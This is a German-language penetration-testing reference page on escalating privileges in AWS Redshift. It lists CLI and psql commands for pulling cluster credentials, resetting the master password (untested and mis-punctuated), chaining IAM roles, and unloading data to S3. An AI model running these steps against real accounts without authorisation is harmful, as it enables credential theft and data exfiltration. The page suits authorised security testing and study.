AWS - Redshift Privesc

Reading time: 5 minutes

Redshift

Für weitere Informationen zu RDS siehe:

AWS - Redshift Enum

redshift:DescribeClusters, redshift:GetClusterCredentials

Mit diesen Berechtigungen können Sie Informationen zu allen Clustern (einschließlich Name und Cluster-Benutzername) abrufen und Zugangsdaten zum Zugriff darauf erhalten:

# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439

Potenzielle Auswirkungen: Sensible Informationen in den Datenbanken finden.

redshift:DescribeClusters, redshift:GetClusterCredentialsWithIAM

Mit diesen Berechtigungen können Sie Informationen über alle Cluster abrufen und Zugangsdaten dafür erhalten.
Beachten Sie, dass der postgres-Benutzer die Berechtigungen hat, die die IAM-Identität hat, die verwendet wurde, um die Zugangsdaten zu erhalten.

# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439

Potenzielle Auswirkungen: Sensible Informationen in den Datenbanken finden.

redshift:DescribeClusters, redshift:ModifyCluster?

Es ist möglich, das Master-Passwort des internen postgres (redshift) Benutzers über die aws cli zu ändern (ich denke, das sind die Berechtigungen, die du benötigst, aber ich habe sie noch nicht getestet):

aws redshift modify-cluster –cluster-identifier <identifier-for-the cluster> –master-user-password ‘master-password’;

Potenzielle Auswirkungen: Sensible Informationen in den Datenbanken finden.

Zugriff auf externe Dienste

Darüber hinaus erlaubt Redshift, wie hier erklärt, auch das Verketten von Rollen (solange die erste die zweite annehmen kann), um weiteren Zugriff zu erhalten, indem Sie sie einfach mit einem Komma trennen: iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';

Lambdas

Wie in https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html erklärt, ist es möglich, eine Lambda-Funktion von Redshift aus aufzurufen mit etwas wie:

CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;

S3

Wie in https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html erklärt, ist es möglich, in S3-Buckets zu lesen und zu schreiben:

# Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
region '<region>'
options;

# Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;

Dynamo

Wie in https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html erklärt, ist es möglich, Daten von dynamodb zu erhalten:

copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';

EMR

Überprüfen Sie https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html

References

• https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a